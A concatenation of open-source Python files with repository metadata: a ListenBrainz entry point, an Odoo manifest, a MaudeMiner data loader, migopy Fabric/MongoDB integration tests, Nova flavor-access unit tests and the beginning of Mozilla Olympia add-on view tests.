if __name__ == "__main__":
app = create_app()
mw = MBIDMappingWriter(app)
mw.start()
|
metabrainz/listenbrainz-server
|
listenbrainz/mbid_mapping_writer/mbid_mapping_writer.py
|
Python
|
gpl-2.0
| 3,503
|
# -*- coding: utf-8 -*-
##############################################################################
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Convert Selection To Filter',
'version': '1.1',
'category': 'Web',
'description': """
FILTER BY SELECTION
===============
This module allows you to convet your selected records in a list view to a
search view filter.
""",
'author': "Mehdi Samadi ",
'website': 'http://www.webirani.co',
'license': 'AGPL-3',
'depends': ['web'],
# 'external_dependencies': {
# 'python': ['xlwt'],
# },
'qweb': ['static/xml/filter_by_selection.xml'],
'js': ['static/*/*.js', 'static/*/js/*.js'],
'installable': True,
'auto_install': False,
'web_preload': False,
}
|
smartforceplus/SmartForceplus
|
.local/share/Odoo/addons/8.0/ConvertSelectionToFilter/__openerp__.py
|
Python
|
agpl-3.0
| 1,506
|
from MaudeMiner.core.database import db
from MaudeMiner.core.models import Narrative
from MaudeMiner.utils import update_progress
from MaudeMiner.core.loader.utils import *
from MaudeMiner.settings import LINES_PER_DB_COMMIT
EXPECTED_NUMBER_OF_FIELDS = 6
def load(limit_commits=None):
# ensure tables exists
db.create_tables(["Narratives"])
print " === Loading Narratives === "
files = get_files_with_prefix("foitext", excludes=["foitextChange", 'foitextAdd'])
num_commits = 0
for line in files:
v = split_fields(line)
if len(v) != EXPECTED_NUMBER_OF_FIELDS:
continue
narrative = Narrative()
narrative.report_key = v[0]
narrative.text_key = v[1]
narrative.text_type_code = v[2]
narrative.patient_sequence_number = v[3]
narrative.date_report = v[4]
narrative.text = v[5]
db.save(narrative, commit=False)
if files.filelineno() % 1000 == 0:
if files.filelineno() % LINES_PER_DB_COMMIT == 0:
db.commit()
update_progress("Loaded: ", files.filelineno(), LINES_IN_CURRENT_FILE[0])
num_commits += 1
if limit_commits and num_commits == limit_commits:
break
db.commit()
print "\n # Done # \n"
|
tklovett/MaudeMiner
|
MaudeMiner/core/loader/narratives.py
|
Python
|
mit
| 1,218
|
#Copyright (C) 2013-2014 by Clearcode <http://clearcode.cc>
#and associates (see AUTHORS).
#
#This file is part of migopy.
#
#Migopy is free software: you can redistribute it and/or modify
#it under the terms of the GNU Lesser General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#Migopy is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU Lesser General Public License for more details.
#
#You should have received a copy of the GNU Lesser General Public License
#along with migopy. If not, see <http://www.gnu.org/licenses/>.
import migopy
import subprocess
import pymongo.errors
import unittest
from glob import glob
from tests import TestDirectory
files = dict()
files['fabfile.py'] = """
import migopy
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
migrations = Migrations.create_task()
"""
fabfile_with_task = """
import migopy
from fabric.api import task
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
migrations = task(Migrations.create_task())
"""
fabfile_with_mongodump = """
import migopy
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
DO_MONGO_DUMP = True
migrations = Migrations.create_task()
"""
files['mongomigrations/001_test.py'] = """
def up(db):
db.test_collection.insert({'test_key': 'test_content'})
def down(db):
pass
"""
files['mongomigrations/2_test.py'] = """
def up(db):
pass
def down(db):
pass
"""
def call(command):
"""Helper for calling shell commands with stdout, stderr handling"""
proc = subprocess.Popen(command, shell=True,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
merr = proc.stderr.read()
print(merr)
print(proc.stdout.read())
return merr
class MongoMigrationsIntegratedBehavior(unittest.TestCase):
def setUp(self):
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
self.Migrations = Migrations
self.migr_mng = Migrations()
self.tmp_dir = TestDirectory()
self.tmp_dir.__enter__()
self.tmp_dir.mkdir('mongomigrations')
for path in files:
self.tmp_dir.create_file(path, files[path])
def tearDown(self):
self.migr_mng.mongo_client.drop_database(self.migr_mng.MONGO_DATABASE)
self.tmp_dir.__exit__(None, None, None)
def test_it_connects_with_mongo_database(self):
self.migr_mng.db.migo_coll.insert({'name': 'migo_test'})
self.assertFalse(
self.migr_mng.db.migo_coll.find_one({'name': 'test_migo'}))
self.assertTrue(
self.migr_mng.db.migo_coll.find_one({'name': 'migo_test'}))
# when user data given to connection
self.migr_mng.db.add_user('migopy', 'migopy_pass')
class Migrations(migopy.MigrationsManager):
MONGO_DATABASE = 'migopy_db_test'
MONGO_USER = 'migopy'
MONGO_USER_PASS = 'migopy_pass'
Migrations()
self.migr_mng.db.remove_user('migopy')
def test_it_do_fab_migrations(self):
self.migr_mng.collection.insert({'name': '001_test.py'})
msg = call('fab migrations')
self.assertIn('2_test.py', msg)
self.assertNotIn('001_test.py', msg)
def test_it_do_fab_migrations_execute(self):
call('fab migrations:execute')
msg = call('fab migrations')
self.assertNotIn('001_test.py', msg)
self.assertNotIn('2_test.py', msg)
self.assertTrue(self.migr_mng.db.test_collection.find_one(
{'test_key': 'test_content'}))
self.assertIn('All migrations', msg)
def test_it_do_fab_migrations_execute_001_test(self):
call('fab migrations:execute,001_test.py')
msg = call('fab migrations')
self.assertNotIn('001_test.py', msg)
self.assertIn('2_test.py', msg)
def test_it_do_fab_migrations_ignore(self):
call('fab migrations:ignore')
msg = call('fab migrations')
self.assertNotIn('001_test.py', msg)
self.assertNotIn('2_test.py', msg)
self.assertIn('All migrations', msg)
def test_it_do_fab_migrations_ignore_001_test(self):
call('fab migrations:ignore,001_test.py')
msg = call('fab migrations')
self.assertNotIn('001_test.py', msg)
self.assertIn('2_test.py', msg)
def test_it_do_fab_migrations_dbdump(self):
self.assertEqual(len(glob('mongodumps/*')), 0)
call('fab migrations:dbdump')
self.assertEqual(len(glob('mongodumps/*')), 1)
def test_it_do_dbdump_during_fab_migrations_execute(self):
self.assertEqual(len(glob('mongodumps/*')), 0)
self.tmp_dir.create_file('fabfile.py', fabfile_with_mongodump)
call('fab migrations:execute')
self.assertEqual(len(glob('mongodumps/*')), 1)
def test_it_works_with_fabric_task_decorator(self):
self.tmp_dir.create_file('fabfile.py', fabfile_with_task)
msg = call('fab migrations')
self.assertNotIn('not found', msg, msg)
self.assertIn('2_test.py', msg)
self.assertIn('001_test.py', msg)
|
ClearcodeHQ/migopy
|
tests/test_integrations.py
|
Python
|
lgpl-3.0
| 5,392
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import mock
from webob import exc
from nova.api.openstack import api_version_request as api_version
from nova.api.openstack.compute import flavor_access \
as flavor_access_v21
from nova.api.openstack.compute import flavors as flavors_api
from nova import context
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
def generate_flavor(flavorid, ispublic):
return {
'id': flavorid,
'flavorid': str(flavorid),
'root_gb': 1,
'ephemeral_gb': 1,
'name': u'test',
'deleted': False,
'created_at': datetime.datetime(2012, 1, 1, 1, 1, 1, 1),
'updated_at': None,
'memory_mb': 512,
'vcpus': 1,
'swap': 512,
'rxtx_factor': 1.0,
'disabled': False,
'extra_specs': {},
'deleted_at': None,
'vcpu_weight': None,
'is_public': bool(ispublic)
}
INSTANCE_TYPES = {
'0': generate_flavor(0, True),
'1': generate_flavor(1, True),
'2': generate_flavor(2, False),
'3': generate_flavor(3, False)}
ACCESS_LIST = [{'flavor_id': '2', 'project_id': 'proj2'},
{'flavor_id': '2', 'project_id': 'proj3'},
{'flavor_id': '3', 'project_id': 'proj3'}]
def fake_get_flavor_access_by_flavor_id(context, flavorid):
res = []
for access in ACCESS_LIST:
if access['flavor_id'] == flavorid:
res.append(access)
return res
def fake_get_flavor_by_flavor_id(context, flavorid, read_deleted=None):
return INSTANCE_TYPES[flavorid]
def _has_flavor_access(flavorid, projectid):
for access in ACCESS_LIST:
if access['flavor_id'] == flavorid and \
access['project_id'] == projectid:
return True
return False
def fake_get_all_flavors_sorted_list(context, inactive=False,
filters=None, sort_key='flavorid',
sort_dir='asc', limit=None, marker=None):
if filters is None or filters['is_public'] is None:
return sorted(INSTANCE_TYPES.values(), key=lambda item: item[sort_key])
res = {}
for k, v in INSTANCE_TYPES.items():
if filters['is_public'] and _has_flavor_access(k, context.project_id):
res.update({k: v})
continue
if v['is_public'] == filters['is_public']:
res.update({k: v})
res = sorted(res.values(), key=lambda item: item[sort_key])
return res
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
api_version_request = api_version.APIVersionRequest("2.1")
def get_db_flavor(self, flavor_id):
return INSTANCE_TYPES[flavor_id]
def is_legacy_v2(self):
return False
class FakeResponse(object):
obj = {'flavor': {'id': '0'},
'flavors': [
{'id': '0'},
{'id': '2'}]
}
def attach(self, **kwargs):
pass
def fake_get_flavor_projects_from_db(context, flavorid):
raise exception.FlavorNotFound(flavor_id=flavorid)
class FlavorAccessTestV21(test.NoDBTestCase):
api_version = "2.1"
FlavorAccessController = flavor_access_v21.FlavorAccessController
FlavorActionController = flavor_access_v21.FlavorActionController
_prefix = "/v2/fake"
validation_ex = exception.ValidationError
def setUp(self):
super(FlavorAccessTestV21, self).setUp()
self.flavor_controller = flavors_api.FlavorsController()
self.req = FakeRequest()
self.req.environ = {"nova.context": context.RequestContext('fake_user',
'fake')}
self.stub_out('nova.db.flavor_get_by_flavor_id',
fake_get_flavor_by_flavor_id)
self.stub_out('nova.db.flavor_get_all',
fake_get_all_flavors_sorted_list)
self.stub_out('nova.db.flavor_access_get_by_flavor_id',
fake_get_flavor_access_by_flavor_id)
# Simulate no API flavors right now
self.stub_out('nova.objects.flavor._flavor_get_all_from_db',
lambda *a, **k: [])
self.stub_out('nova.objects.Flavor.in_api', False)
self.stub_out('nova.objects.flavor._get_projects_from_db',
fake_get_flavor_projects_from_db)
self.flavor_access_controller = self.FlavorAccessController()
self.flavor_action_controller = self.FlavorActionController()
def _verify_flavor_list(self, result, expected):
# result already sorted by flavor_id
self.assertEqual(len(result), len(expected))
for d1, d2 in zip(result, expected):
self.assertEqual(d1['id'], d2['id'])
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_list_flavor_access_public(self, mock_api_get):
# query os-flavor-access on public flavor should return 404
self.assertRaises(exc.HTTPNotFound,
self.flavor_access_controller.index,
self.req, '1')
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_list_flavor_access_private(self, mock_api_get):
expected = {'flavor_access': [
{'flavor_id': '2', 'tenant_id': 'proj2'},
{'flavor_id': '2', 'tenant_id': 'proj3'}]}
result = self.flavor_access_controller.index(self.req, '2')
self.assertEqual(result, expected)
def test_list_flavor_with_admin_default_proj1(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
use_admin_context=True)
req.environ['nova.context'].project_id = 'proj1'
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_admin_default_proj2(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}, {'id': '2'}]}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
use_admin_context=True)
req.environ['nova.context'].project_id = 'proj2'
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_admin_ispublic_true(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
url = self._prefix + '/flavors?is_public=true'
req = fakes.HTTPRequest.blank(url,
use_admin_context=True)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_admin_ispublic_false(self):
expected = {'flavors': [{'id': '2'}, {'id': '3'}]}
url = self._prefix + '/flavors?is_public=false'
req = fakes.HTTPRequest.blank(url,
use_admin_context=True)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_admin_ispublic_false_proj2(self):
expected = {'flavors': [{'id': '2'}, {'id': '3'}]}
url = self._prefix + '/flavors?is_public=false'
req = fakes.HTTPRequest.blank(url,
use_admin_context=True)
req.environ['nova.context'].project_id = 'proj2'
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_admin_ispublic_none(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}, {'id': '2'},
{'id': '3'}]}
url = self._prefix + '/flavors?is_public=none'
req = fakes.HTTPRequest.blank(url,
use_admin_context=True)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_no_admin_default(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors',
use_admin_context=False)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_no_admin_ispublic_true(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
url = self._prefix + '/flavors?is_public=true'
req = fakes.HTTPRequest.blank(url,
use_admin_context=False)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_no_admin_ispublic_false(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
url = self._prefix + '/flavors?is_public=false'
req = fakes.HTTPRequest.blank(url,
use_admin_context=False)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_list_flavor_with_no_admin_ispublic_none(self):
expected = {'flavors': [{'id': '0'}, {'id': '1'}]}
url = self._prefix + '/flavors?is_public=none'
req = fakes.HTTPRequest.blank(url,
use_admin_context=False)
result = self.flavor_controller.index(req)
self._verify_flavor_list(result['flavors'], expected['flavors'])
def test_show(self):
resp = FakeResponse()
self.flavor_action_controller.show(self.req, resp, '0')
self.assertEqual({'id': '0', 'os-flavor-access:is_public': True},
resp.obj['flavor'])
self.flavor_action_controller.show(self.req, resp, '2')
self.assertEqual({'id': '0', 'os-flavor-access:is_public': False},
resp.obj['flavor'])
def test_detail(self):
resp = FakeResponse()
self.flavor_action_controller.detail(self.req, resp)
self.assertEqual([{'id': '0', 'os-flavor-access:is_public': True},
{'id': '2', 'os-flavor-access:is_public': False}],
resp.obj['flavors'])
def test_create(self):
resp = FakeResponse()
self.flavor_action_controller.create(self.req, {}, resp)
self.assertEqual({'id': '0', 'os-flavor-access:is_public': True},
resp.obj['flavor'])
def _get_add_access(self):
if self.api_version == "2.1":
return self.flavor_action_controller._add_tenant_access
else:
return self.flavor_action_controller._addTenantAccess
def _get_remove_access(self):
if self.api_version == "2.1":
return self.flavor_action_controller._remove_tenant_access
else:
return self.flavor_action_controller._removeTenantAccess
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_add_tenant_access(self, mock_api_get):
def stub_add_flavor_access(context, flavorid, projectid):
self.assertEqual('3', flavorid, "flavorid")
self.assertEqual("proj2", projectid, "projectid")
self.stub_out('nova.db.flavor_access_add',
stub_add_flavor_access)
expected = {'flavor_access':
[{'flavor_id': '3', 'tenant_id': 'proj3'}]}
body = {'addTenantAccess': {'tenant': 'proj2'}}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
use_admin_context=True)
add_access = self._get_add_access()
result = add_access(req, '3', body=body)
self.assertEqual(result, expected)
@mock.patch('nova.objects.Flavor.get_by_flavor_id',
side_effect=exception.FlavorNotFound(flavor_id='1'))
def test_add_tenant_access_with_flavor_not_found(self, mock_get):
body = {'addTenantAccess': {'tenant': 'proj2'}}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
use_admin_context=True)
add_access = self._get_add_access()
self.assertRaises(exc.HTTPNotFound,
add_access, req, '2', body=body)
def test_add_tenant_access_with_no_tenant(self):
req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
use_admin_context=True)
body = {'addTenantAccess': {'foo': 'proj2'}}
add_access = self._get_add_access()
self.assertRaises(self.validation_ex,
add_access, req, '2', body=body)
body = {'addTenantAccess': {'tenant': ''}}
self.assertRaises(self.validation_ex,
add_access, req, '2', body=body)
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_add_tenant_access_with_already_added_access(self, mock_api_get):
def stub_add_flavor_access(context, flavorid, projectid):
raise exception.FlavorAccessExists(flavor_id=flavorid,
project_id=projectid)
self.stub_out('nova.db.flavor_access_add',
stub_add_flavor_access)
body = {'addTenantAccess': {'tenant': 'proj2'}}
add_access = self._get_add_access()
self.assertRaises(exc.HTTPConflict,
add_access, self.req, '3', body=body)
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_remove_tenant_access_with_bad_access(self, mock_api_get):
def stub_remove_flavor_access(context, flavorid, projectid):
raise exception.FlavorAccessNotFound(flavor_id=flavorid,
project_id=projectid)
self.stub_out('nova.db.flavor_access_remove',
stub_remove_flavor_access)
body = {'removeTenantAccess': {'tenant': 'proj2'}}
remove_access = self._get_remove_access()
self.assertRaises(exc.HTTPNotFound,
remove_access, self.req, '3', body=body)
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_add_tenant_access_is_public(self, mock_api_get):
body = {'addTenantAccess': {'tenant': 'proj2'}}
req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
use_admin_context=True)
req.api_version_request = api_version.APIVersionRequest('2.7')
add_access = self._get_add_access()
self.assertRaises(exc.HTTPConflict,
add_access, req, '1', body=body)
@mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db',
side_effect=exception.FlavorNotFound(flavor_id='foo'))
def test_delete_tenant_access_with_no_tenant(self, mock_api_get):
req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action',
use_admin_context=True)
remove_access = self._get_remove_access()
body = {'removeTenantAccess': {'foo': 'proj2'}}
self.assertRaises(self.validation_ex,
remove_access, req, '2', body=body)
body = {'removeTenantAccess': {'tenant': ''}}
self.assertRaises(self.validation_ex,
remove_access, req, '2', body=body)
class FlavorAccessPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(FlavorAccessPolicyEnforcementV21, self).setUp()
self.act_controller = flavor_access_v21.FlavorActionController()
self.access_controller = flavor_access_v21.FlavorAccessController()
self.req = fakes.HTTPRequest.blank('')
def test_add_tenant_access_policy_failed(self):
rule_name = "os_compute_api:os-flavor-access:add_tenant_access"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.act_controller._add_tenant_access, self.req, fakes.FAKE_UUID,
body={'addTenantAccess': {'tenant': fakes.FAKE_UUID}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_remove_tenant_access_policy_failed(self):
rule_name = ("os_compute_api:os-flavor-access:"
"remove_tenant_access")
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.act_controller._remove_tenant_access, self.req,
fakes.FAKE_UUID,
body={'removeTenantAccess': {'tenant': fakes.FAKE_UUID}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_extend_create_policy_failed(self):
rule_name = "os_compute_api:os-flavor-access"
self.policy.set_rules({rule_name: "project:non_fake"})
self.act_controller.create(self.req, None, None)
def test_extend_show_policy_failed(self):
rule_name = "os_compute_api:os-flavor-access"
self.policy.set_rules({rule_name: "project:non_fake"})
self.act_controller.show(self.req, None, None)
def test_extend_detail_policy_failed(self):
rule_name = "os_compute_api:os-flavor-access"
self.policy.set_rules({rule_name: "project:non_fake"})
self.act_controller.detail(self.req, None)
def test_index_policy_failed(self):
rule_name = "os_compute_api:os-flavor-access"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.access_controller.index, self.req,
fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
|
vmturbo/nova
|
nova/tests/unit/api/openstack/compute/test_flavor_access.py
|
Python
|
apache-2.0
| 19,273
|
# -*- coding: utf-8 -*-
import json
import random
import re
import os
from django.conf import settings
from django.core import mail
from django.core.cache import cache
from django.test.utils import override_settings
from django.test.client import Client
from django.utils.http import urlunquote
import mock
import pytest
import waffle
from elasticsearch import Elasticsearch
from mock import patch
from pyquery import PyQuery as pq
from waffle.testutils import override_switch
from rest_framework.test import APIRequestFactory
from olympia import amo
from olympia.abuse.models import AbuseReport
from olympia.addons.models import (
Addon, AddonDependency, AddonFeatureCompatibility, AddonUser, Category,
CompatOverride, CompatOverrideRange, Persona, ReplacementAddon,
AddonCategory)
from olympia.addons.utils import generate_addon_guid
from olympia.addons.views import (
DEFAULT_FIND_REPLACEMENT_PATH, FIND_REPLACEMENT_SRC,
AddonAutoCompleteSearchView, AddonSearchView)
from olympia.amo.templatetags.jinja_helpers import numberfmt, urlparams
from olympia.amo.tests import (
APITestClient, ESTestCase, TestCase, addon_factory, collection_factory,
reverse_ns, user_factory, version_factory)
from olympia.amo.urlresolvers import get_outgoing_url, reverse
from olympia.bandwagon.models import Collection, FeaturedCollection
from olympia.constants.categories import CATEGORIES, CATEGORIES_BY_ID
from olympia.constants.licenses import LICENSES_BY_BUILTIN
from olympia.files.models import WebextPermission, WebextPermissionDescription
from olympia.ratings.models import Rating
from olympia.users.models import UserProfile
from olympia.users.templatetags.jinja_helpers import users_list
from olympia.versions.models import (
ApplicationsVersions, AppVersion, Version, VersionPreview)
def norm(s):
"""Normalize a string so that whitespace is uniform and remove whitespace
between tags."""
s = re.sub(r'\s+', ' ', str(s)).strip()
return re.sub(r'>\s+<', '><', s)
def add_addon_author(original, copy):
"""Make both add-ons share an author."""
author = original.listed_authors[0]
AddonUser.objects.create(addon=copy, user=author, listed=True)
return author
def check_cat_sidebar(url, addon):
"""Ensures that the sidebar shows the categories for the correct type."""
cache.clear()
for type_ in [amo.ADDON_EXTENSION, amo.ADDON_THEME, amo.ADDON_SEARCH]:
addon.update(type=type_)
r = Client().get(url)
assert pq(r.content)('#side-nav').attr('data-addontype') == str(type_)
def _test_hovercards(self, doc, addons, src=''):
addons = list(addons)
assert doc.find('.addon.hovercard').length == len(addons)
for addon in addons:
btn = doc.find('.install[data-addon="%s"]' % addon.id)
assert btn.length == 1
hc = btn.parents('.addon.hovercard')
assert hc.find('a').attr('href') == (
urlparams(addon.get_url_path(), src=src))
assert hc.find('h3').text() == unicode(addon.name)
class TestHomepage(TestCase):
def setUp(self):
super(TestHomepage, self).setUp()
self.base_url = reverse('home')
def test_304(self):
self.url = '/en-US/firefox/'
response = self.client.get(self.url)
assert 'ETag' in response
response = self.client.get(self.url,
HTTP_IF_NONE_MATCH=response['ETag'])
assert response.status_code == 304
assert not response.content
response = self.client.get(self.url,
HTTP_IF_NONE_MATCH='random_etag_string')
assert response.status_code == 200
assert response.content
def test_thunderbird(self):
"""Thunderbird homepage should have the Thunderbird title."""
r = self.client.get('/en-US/thunderbird/')
doc = pq(r.content)
assert 'Add-ons for Thunderbird' == doc('title').text()
def test_welcome_msg(self):
r = self.client.get('/en-US/firefox/')
welcome = pq(r.content)('#site-welcome').remove('a.close')
assert welcome.text() == (
'Welcome to Firefox Add-ons.\nChoose from thousands of extra '
'features and styles to make Firefox your own.')
r = self.client.get('/en-US/thunderbird/')
welcome = pq(r.content)('#site-welcome').remove('a.close')
assert welcome.text() == (
'Welcome to Thunderbird Add-ons.\nAdd extra features and styles '
'to make Thunderbird your own.')
def test_try_new_frontend_banner_presence(self):
self.url = '/en-US/firefox/'
response = self.client.get(self.url)
assert 'AMO is getting a new look.' not in response.content
with override_switch('try-new-frontend', active=True):
response = self.client.get(self.url)
assert 'AMO is getting a new look.' in response.content
class TestHomepageFeatures(TestCase):
fixtures = ['base/appversion',
'base/users',
'base/addon_3615',
'base/collections',
'base/global-stats',
'base/featured',
'addons/featured',
'bandwagon/featured_collections']
def setUp(self):
super(TestHomepageFeatures, self).setUp()
self.url = reverse('home')
def test_no_unreviewed(self):
response = self.client.get(self.url)
addon_lists = 'popular featured hotness personas'.split()
for key in addon_lists:
for addon in response.context[key]:
assert addon.status != amo.STATUS_NOMINATED
def test_seeall(self):
Collection.objects.update(type=amo.COLLECTION_FEATURED)
doc = pq(self.client.get(self.url).content)
browse_extensions = reverse('browse.extensions')
browse_personas = reverse('browse.personas')
browse_collections = reverse('collections.list')
sections = {
'#popular-extensions': browse_extensions + '?sort=users',
'#featured-extensions': browse_extensions + '?sort=featured',
'#upandcoming': browse_extensions + '?sort=hotness',
'#featured-themes': browse_personas,
'#featured-collections': browse_collections + '?sort=featured',
}
for id_, url in sections.iteritems():
# Check that the "See All" link points to the correct page.
assert doc.find('%s .seeall' % id_).attr('href') == url
class TestOldContributionRedirects(TestCase):
fixtures = ['base/appversion', 'base/addon_592']
def setUp(self):
self.detail_url = reverse('addons.detail', args=['a592'])
def test_installed(self):
url = reverse('addons.installed', args=['a592'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
def test_contribute(self):
url = reverse('addons.contribute', args=['a592'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
def test_contribute_status(self):
url = reverse('addons.contribute_status', args=['a592', 'complete'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
url = reverse('addons.contribute_status', args=['a592', 'cancel'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
def test_meet(self):
url = reverse('addons.meet', args=['a592'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
def test_thanks(self):
url = reverse('addons.thanks', args=['a592'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
def test_roadblock(self):
url = reverse('addons.roadblock', args=['a592'])
response = self.client.get(url, follow=True)
self.assert3xx(response, self.detail_url, 301)
class TestContributionsURL(TestCase):
fixtures = ['base/addon_3615', 'base/addon_592',
'base/users', 'addons/eula+contrib-addon',
'addons/addon_228106_info+dev+bio.json',
'addons/addon_228107_multiple-devs.json']
def setUp(self):
self.addon = Addon.objects.get(pk=592)
user = UserProfile.objects.get(pk=999)
AddonUser(addon=self.addon, user=user).save()
def test_button_appears_if_set(self):
response = self.client.get(self.addon.get_url_path())
# No button by default because Addon.contributions url not set.
assert pq(response.content)('#contribution-url-button').length == 0
# Set it and it appears though.
self.addon.update(contributions='https://paypal.me/foooo')
response = self.client.get(self.addon.get_url_path()
)
button = pq(response.content)('#contribution-url-button')
assert button.length == 1, response.content
assert button[0].attrib['href'] == get_outgoing_url(
'https://paypal.me/foooo')
class TestLicensePage(TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestLicensePage, self).setUp()
self.addon = Addon.objects.get(id=3615)
self.version = self.addon.current_version
def test_legacy_redirect(self):
response = self.client.get(
'/en-US/firefox/versions/license/%s' % self.version.id,
follow=True)
self.assert3xx(response, self.version.license_url(), 301)
def test_legacy_redirect_deleted(self):
self.version.delete()
response = self.client.get(
'/en-US/firefox/versions/license/%s' % self.version.id)
assert response.status_code == 404
def test_explicit_version(self):
url = reverse('addons.license', args=['a3615', self.version.version])
r = self.client.get(url)
assert r.status_code == 200
assert r.context['version'] == self.version
def test_implicit_version(self):
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
assert r.status_code == 200
assert r.context['version'] == self.addon.current_version
def test_no_license(self):
self.version.update(license=None)
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
assert r.status_code == 404
def test_no_version(self):
self.addon.versions.all().delete()
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
assert r.status_code == 404
def test_unlisted_version(self):
self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert self.version.license
url = reverse('addons.license', args=['a3615'])
r = self.client.get(url)
assert r.status_code == 404
def test_duplicate_version_number(self):
Version.objects.create(addon=self.addon, version=self.version.version)
url = reverse('addons.license', args=['a3615', self.version.version])
r = self.client.get(url)
assert r.status_code == 200
assert r.context['version'] == self.addon.current_version
def test_cat_sidebar(self):
check_cat_sidebar(reverse('addons.license', args=['a3615']),
self.addon)
class TestICloudRedirect(TestCase):
def setUp(self):
addon_factory(slug='icloud-bookmarks')
@override_switch('icloud_bookmarks_redirect', active=True)
def test_redirect_with_waffle(self):
r = self.client.get('/en-US/firefox/addon/icloud-bookmarks/')
assert r.status_code == 302
assert r.get('location') == '%s/blocked/i1214/' % settings.SITE_URL
@override_switch('icloud_bookmarks_redirect', active=False)
def test_redirect_without_waffle(self):
